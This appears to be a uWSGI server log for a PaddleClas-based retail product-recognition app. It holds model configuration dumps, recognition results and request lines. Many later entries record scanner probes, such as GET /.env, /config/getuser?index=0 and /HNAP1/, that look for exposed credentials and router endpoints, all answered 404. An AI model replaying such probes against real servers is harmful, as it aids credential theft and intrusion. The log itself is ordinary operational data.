02:01:45 INFO: enable_profile : False +2022-01-27 02:01:45 INFO: gpu_mem : 8000 +2022-01-27 02:01:45 INFO: ir_optim : True +2022-01-27 02:01:45 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:01:45 INFO: use_fp16 : False +2022-01-27 02:01:45 INFO: use_gpu : False +2022-01-27 02:01:45 INFO: use_tensorrt : False +2022-01-27 02:01:45 INFO: IndexProcess : +2022-01-27 02:01:45 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:01:45 INFO: delimiter : +2022-01-27 02:01:45 INFO: dist_type : IP +2022-01-27 02:01:45 INFO: embedding_size : 512 +2022-01-27 02:01:45 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:01:45 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:01:45 INFO: index_method : HNSW32 +2022-01-27 02:01:45 INFO: index_operation : new +2022-01-27 02:01:45 INFO: RecPostProcess : None +2022-01-27 02:01:45 INFO: RecPreProcess : +2022-01-27 02:01:45 INFO: transform_ops : +2022-01-27 02:01:45 INFO: ResizeImage : +2022-01-27 02:01:45 INFO: size : 224 +2022-01-27 02:01:45 INFO: NormalizeImage : +2022-01-27 02:01:45 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:01:45 INFO: order : +2022-01-27 02:01:45 INFO: scale : 0.00392157 +2022-01-27 02:01:45 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:01:45 INFO: ToCHWImage : None + 0%| | 0/192 [00:00 generated 34 bytes in 8118 msecs (HTTP/1.1 200) 5 headers in 157 bytes (110 switches on core 0) +2022-01-27 02:02:02 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:02:02 INFO: DetPostProcess : +2022-01-27 02:02:02 INFO: DetPreProcess : +2022-01-27 02:02:02 INFO: transform_ops : +2022-01-27 02:02:02 INFO: DetResize : +2022-01-27 02:02:02 INFO: interp : 2 +2022-01-27 02:02:02 INFO: keep_ratio : False +2022-01-27 02:02:02 INFO: target_size : [640, 640] +2022-01-27 02:02:02 INFO: DetNormalizeImage : +2022-01-27 02:02:02 INFO: is_scale : True +2022-01-27 02:02:02 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:02:02 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:02:02 INFO: DetPermute : +2022-01-27 02:02:02 INFO: Global : +2022-01-27 02:02:02 INFO: batch_size : 1 +2022-01-27 02:02:02 INFO: cpu_num_threads : 1 +2022-01-27 02:02:02 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 02:02:02 INFO: enable_benchmark : True +2022-01-27 02:02:02 INFO: enable_mkldnn : True +2022-01-27 02:02:02 INFO: enable_profile : False +2022-01-27 02:02:02 INFO: gpu_mem : 8000 +2022-01-27 02:02:02 INFO: image_shape : [3, 640, 640] +2022-01-27 02:02:02 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-27 02:02:02 INFO: ir_optim : True +2022-01-27 02:02:02 INFO: labe_list : ['foreground'] +2022-01-27 02:02:02 INFO: max_det_results : 5 +2022-01-27 02:02:02 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:02:02 INFO: rec_nms_thresold : 0.05 +2022-01-27 02:02:02 INFO: threshold : 0.2 +2022-01-27 02:02:02 INFO: use_fp16 : False +2022-01-27 02:02:02 INFO: use_gpu : False +2022-01-27 02:02:02 INFO: use_tensorrt : False +2022-01-27 02:02:02 INFO: IndexProcess : +2022-01-27 02:02:02 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:02:02 INFO: return_k : 5 +2022-01-27 02:02:02 INFO: score_thres : 0.5 +2022-01-27 02:02:02 INFO: RecPostProcess : None +2022-01-27 02:02:02 INFO: RecPreProcess : +2022-01-27 02:02:02 INFO: transform_ops : +2022-01-27 02:02:02 INFO: ResizeImage : +2022-01-27 02:02:02 INFO: size : 224 +2022-01-27 02:02:02 INFO: NormalizeImage : +2022-01-27 02:02:02 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:02:02 INFO: order : +2022-01-27 02:02:02 INFO: scale : 0.00392157 +2022-01-27 02:02:02 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:02:02 INFO: ToCHWImage : None +Inference: 373.77071380615234 ms per batch image +[{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194}, {'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656}, {'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474}] +{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194} +{'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656} +{'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474} +234 +["{'bbox': [49, 267, 477, 797], 'rec_docs': '小圆饼干', 'rec_scores': 0.83315194}\n", "{'bbox': [541, 106, 948, 842], 'rec_docs': '江小白', 'rec_scores': 0.8225656}\n", "{'bbox': [1006, 271, 1303, 795], 'rec_docs': '修正带', 'rec_scores': 0.78487474}\n"] +['小圆饼干', '江小白', '修正带'] +['小圆饼干', '7', '江小白', '20', '修正带', '6'] +[pid: 13129|app: 0|req: 34/38] 101.83.69.232 () {36 vars in 813 bytes} [Thu Jan 27 02:02:01 2022] POST /reference/ => generated 168 bytes in 3466 msecs (HTTP/1.1 200) 5 headers in 158 bytes (130 switches on core 0) +[pid: 13128|app: 0|req: 5/39] 177.223.16.60 () {32 vars in 470 bytes} [Thu Jan 27 02:03:00 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 1/40] 101.83.69.232 () {36 vars in 799 bytes} [Thu Jan 27 02:07:30 2022] POST /find/ => generated 114 bytes in 241 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +2022-01-27 02:07:35 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 02:07:35 INFO: Global : +2022-01-27 02:07:35 INFO: batch_size : 32 +2022-01-27 02:07:35 INFO: cpu_num_threads : 1 +2022-01-27 02:07:35 INFO: enable_benchmark : True +2022-01-27 02:07:35 INFO: enable_mkldnn : True +2022-01-27 02:07:35 INFO: enable_profile : False +2022-01-27 02:07:35 INFO: gpu_mem : 8000 +2022-01-27 02:07:35 INFO: ir_optim : True +2022-01-27 02:07:35 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 02:07:35 INFO: use_fp16 : False +2022-01-27 02:07:35 INFO: use_gpu : False +2022-01-27 02:07:35 INFO: use_tensorrt : False +2022-01-27 02:07:35 INFO: IndexProcess : +2022-01-27 02:07:35 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-01-27 02:07:35 INFO: delimiter : +2022-01-27 02:07:35 INFO: dist_type : IP +2022-01-27 02:07:35 INFO: embedding_size : 512 +2022-01-27 02:07:35 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-01-27 02:07:35 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 02:07:35 INFO: index_method : HNSW32 +2022-01-27 02:07:35 INFO: index_operation : new +2022-01-27 02:07:35 INFO: RecPostProcess : None +2022-01-27 02:07:35 INFO: RecPreProcess : +2022-01-27 02:07:35 INFO: transform_ops : +2022-01-27 02:07:35 INFO: ResizeImage : +2022-01-27 02:07:35 INFO: size : 224 +2022-01-27 02:07:35 INFO: NormalizeImage : +2022-01-27 02:07:35 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 02:07:35 INFO: order : +2022-01-27 02:07:35 INFO: scale : 0.00392157 +2022-01-27 02:07:35 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 02:07:35 INFO: ToCHWImage : None + 0%| | 0/191 [00:00 generated 34 bytes in 7585 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 36/42] 192.241.214.29 () {34 vars in 394 bytes} [Thu Jan 27 03:21:10 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-27 03:41:46 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-27 03:41:46 INFO: DetPostProcess : +2022-01-27 03:41:46 INFO: DetPreProcess : +2022-01-27 03:41:46 INFO: transform_ops : +2022-01-27 03:41:46 INFO: DetResize : +2022-01-27 03:41:46 INFO: interp : 2 +2022-01-27 03:41:46 INFO: keep_ratio : False +2022-01-27 03:41:46 INFO: target_size : [640, 640] +2022-01-27 03:41:46 INFO: DetNormalizeImage : +2022-01-27 03:41:46 INFO: is_scale : True +2022-01-27 03:41:46 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 03:41:46 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 03:41:46 INFO: DetPermute : +2022-01-27 03:41:46 INFO: Global : +2022-01-27 03:41:46 INFO: batch_size : 1 +2022-01-27 03:41:46 INFO: cpu_num_threads : 1 +2022-01-27 03:41:46 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-27 03:41:46 INFO: enable_benchmark : True +2022-01-27 03:41:46 INFO: enable_mkldnn : True +2022-01-27 03:41:46 INFO: enable_profile : False +2022-01-27 03:41:46 INFO: gpu_mem : 8000 +2022-01-27 03:41:46 INFO: image_shape : [3, 640, 640] +2022-01-27 03:41:46 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-27 03:41:46 INFO: ir_optim : True +2022-01-27 03:41:46 INFO: labe_list : ['foreground'] +2022-01-27 03:41:46 INFO: max_det_results : 5 +2022-01-27 03:41:46 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-27 03:41:46 INFO: rec_nms_thresold : 0.05 +2022-01-27 03:41:46 INFO: threshold : 0.2 +2022-01-27 03:41:46 INFO: use_fp16 : False +2022-01-27 03:41:46 INFO: use_gpu : False +2022-01-27 03:41:46 INFO: use_tensorrt : False +2022-01-27 03:41:46 INFO: IndexProcess : +2022-01-27 03:41:46 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-27 03:41:46 INFO: return_k : 5 +2022-01-27 03:41:46 INFO: score_thres : 0.5 +2022-01-27 03:41:46 INFO: RecPostProcess : None +2022-01-27 03:41:46 INFO: RecPreProcess : +2022-01-27 03:41:46 INFO: transform_ops : +2022-01-27 03:41:46 INFO: ResizeImage : +2022-01-27 03:41:46 INFO: size : 224 +2022-01-27 03:41:46 INFO: NormalizeImage : +2022-01-27 03:41:46 INFO: mean : [0.485, 0.456, 0.406] +2022-01-27 03:41:46 INFO: order : +2022-01-27 03:41:46 INFO: scale : 0.00392157 +2022-01-27 03:41:46 INFO: std : [0.229, 0.224, 0.225] +2022-01-27 03:41:46 INFO: ToCHWImage : None +Inference: 377.70819664001465 ms per batch image +[{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734}] +{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734} +234 +["{'bbox': [174, 36, 384, 469], 'rec_docs': '小度充电宝', 'rec_scores': 0.71902734}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 37/43] 49.79.96.123 () {34 vars in 447 bytes} [Thu Jan 27 03:41:45 2022] POST /reference_client/ => generated 126 bytes in 3078 msecs (HTTP/1.1 200) 5 headers in 158 bytes (17 switches on core 0) +[pid: 13129|app: 0|req: 38/44] 83.97.20.34 () {26 vars in 287 bytes} [Thu Jan 27 04:21:44 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 39/45] 101.133.131.45 () {36 vars in 550 bytes} [Thu Jan 27 04:30:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 40/46] 71.201.187.52 () {30 vars in 436 bytes} [Thu Jan 27 05:02:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 41/47] 62.171.132.199 () {40 vars in 672 bytes} [Thu Jan 27 06:04:45 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 42/48] 103.207.42.130 () {36 vars in 590 bytes} [Thu Jan 27 06:30:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 6/49] 103.207.42.130 () {40 vars in 697 bytes} [Thu Jan 27 06:30:49 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 43/50] 74.82.47.5 () {28 vars in 304 bytes} [Thu Jan 27 06:38:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 44/51] 198.98.62.159 () {42 vars in 782 bytes} [Thu Jan 27 07:27:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 45/52] 203.109.44.215 () {32 vars in 464 bytes} [Thu Jan 27 07:54:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 46/53] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 07:58:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 47/54] 103.168.29.14 () {30 vars in 340 bytes} [Thu Jan 27 08:13:48 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 48/55] 103.168.29.14 () {30 vars in 339 bytes} [Thu Jan 27 08:13:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 49/56] 189.127.145.167 () {32 vars in 465 bytes} [Thu Jan 27 09:22:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 50/57] 69.162.231.221 () {36 vars in 524 bytes} [Thu Jan 27 09:24:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 51/58] 69.162.231.221 () {40 vars in 631 bytes} [Thu Jan 27 09:24:12 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 52/59] 107.189.28.51 () {28 vars in 310 bytes} [Thu Jan 27 10:46:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 53/60] 107.189.28.51 () {40 vars in 671 bytes} [Thu Jan 27 10:46:21 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 54/61] 161.189.192.94 () {40 vars in 725 bytes} [Thu Jan 27 11:51:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 55/62] 42.240.141.27 () {26 vars in 283 bytes} [Thu Jan 27 12:09:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 56/63] 128.1.248.42 () {34 vars in 486 bytes} [Thu Jan 27 13:20:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 57/64] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 14:20:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 58/65] 31.7.57.130 () {40 vars in 669 bytes} [Thu Jan 27 15:34:16 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 59/66] 23.250.19.242 () {34 vars in 536 bytes} [Thu Jan 27 16:43:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 60/67] 23.250.19.242 () {30 vars in 359 bytes} [Thu Jan 27 16:43:32 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 61/68] 23.250.19.242 () {30 vars in 361 bytes} [Thu Jan 27 16:43:33 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 62/69] 23.250.19.242 () {30 vars in 387 bytes} [Thu Jan 27 16:43:33 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 63/70] 23.250.19.242 () {36 vars in 514 bytes} [Thu Jan 27 16:43:36 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 64/71] 130.211.54.158 () {42 vars in 564 bytes} [Thu Jan 27 16:43:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 65/72] 83.97.20.34 () {26 vars in 287 bytes} [Thu Jan 27 16:43:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 66/73] 62.171.132.199 () {40 vars in 672 bytes} [Thu Jan 27 16:57:51 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 67/74] 35.195.93.98 () {42 vars in 560 bytes} [Thu Jan 27 17:09:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 68/75] 81.39.100.157 () {34 vars in 393 bytes} [Thu Jan 27 17:11:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 69/76] 34.227.81.53 () {36 vars in 519 bytes} [Thu Jan 27 20:09:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 70/77] 83.97.20.34 () {30 vars in 329 bytes} [Thu Jan 27 20:48:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 71/78] 1.13.189.96 () {34 vars in 367 bytes} [Thu Jan 27 22:15:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 72/79] 83.97.20.34 () {26 vars in 287 bytes} [Thu Jan 27 22:50:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 73/80] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 00:13:56 2022] GET /dispatch.asp => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 74/81] 128.1.248.42 () {34 vars in 486 bytes} [Fri Jan 28 00:49:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 75/82] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 02:15:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 76/83] 128.14.209.170 () {34 vars in 488 bytes} [Fri Jan 28 02:36:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 77/84] 128.14.209.170 () {34 vars in 508 bytes} [Fri Jan 28 02:36:41 2022] GET /analytics/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 78/85] 47.101.202.143 () {34 vars in 460 bytes} [Fri Jan 28 02:38:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 79/86] 192.241.203.213 () {34 vars in 395 bytes} [Fri Jan 28 03:21:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 80/87] 43.134.70.7 () {34 vars in 501 bytes} [Fri Jan 28 03:55:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 81/88] 183.136.225.56 () {34 vars in 456 bytes} [Fri Jan 28 03:59:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 82/89] 83.97.20.34 () {26 vars in 287 bytes} [Fri Jan 28 05:19:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 83/90] 103.203.56.1 () {34 vars in 388 bytes} [Fri Jan 28 05:33:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 84/91] 68.55.98.151 () {28 vars in 306 bytes} [Fri Jan 28 06:09:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 85/92] 91.151.93.95 () {40 vars in 627 bytes} [Fri Jan 28 06:17:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 86/93] 39.99.137.22 () {34 vars in 410 bytes} [Fri Jan 28 06:26:50 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13123|app: 0|req: 1/94] 39.99.137.22 () {32 vars in 408 bytes} [Fri Jan 28 06:26:50 2022] GET /text4041643351210 => generated 179 bytes in 243 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 7/95] 39.99.137.22 () {32 vars in 394 bytes} [Fri Jan 28 06:26:50 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 87/96] 39.99.137.22 () {32 vars in 384 bytes} [Fri Jan 28 06:26:51 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 88/97] 39.99.137.22 () {28 vars in 306 bytes} [Fri Jan 28 06:26:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 89/98] 39.99.137.22 () {36 vars in 462 bytes} [Fri Jan 28 06:27:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 90/99] 39.99.137.22 () {34 vars in 413 bytes} [Fri Jan 28 06:27:06 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 91/100] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 06:45:52 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 92/101] 172.245.189.12 () {36 vars in 524 bytes} [Fri Jan 28 06:59:36 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 93/102] 172.245.189.12 () {40 vars in 631 bytes} [Fri Jan 28 06:59:37 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 94/103] 47.101.162.42 () {34 vars in 434 bytes} [Fri Jan 28 07:35:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 95/104] 178.208.92.138 () {40 vars in 629 bytes} [Fri Jan 28 07:41:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 96/105] 62.171.132.199 () {40 vars in 672 bytes} [Fri Jan 28 07:42:10 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 97/106] 128.14.133.58 () {34 vars in 487 bytes} [Fri Jan 28 08:06:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 98/107] 109.237.103.9 () {36 vars in 523 bytes} [Fri Jan 28 08:10:33 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 99/108] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 08:31:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 100/109] 177.54.85.10 () {32 vars in 462 bytes} [Fri Jan 28 08:48:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 101/110] 193.118.53.210 () {34 vars in 488 bytes} [Fri Jan 28 10:27:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 102/111] 124.121.90.118 () {34 vars in 517 bytes} [Fri Jan 28 10:53:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 103/112] 83.97.20.34 () {26 vars in 286 bytes} [Fri Jan 28 11:36:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 104/113] 192.241.212.153 () {34 vars in 413 bytes} [Fri Jan 28 11:56:33 2022] GET /config.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 105/114] 136.144.41.117 () {40 vars in 568 bytes} [Fri Jan 28 12:16:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 106/115] 47.102.137.8 () {34 vars in 433 bytes} [Fri Jan 28 12:36:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 107/116] 184.105.247.196 () {28 vars in 309 bytes} [Fri Jan 28 13:03:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on 